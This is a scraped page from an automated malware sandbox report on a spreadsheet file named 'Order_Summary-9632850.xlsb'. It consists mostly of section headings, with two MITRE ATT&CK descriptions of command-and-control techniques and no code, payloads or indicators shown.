Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Order_Summary-9632850.xlsb

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Order_Summary-9632850.xlsb"

Indicators

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 04591090, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
sleepmemorythreadCOMMON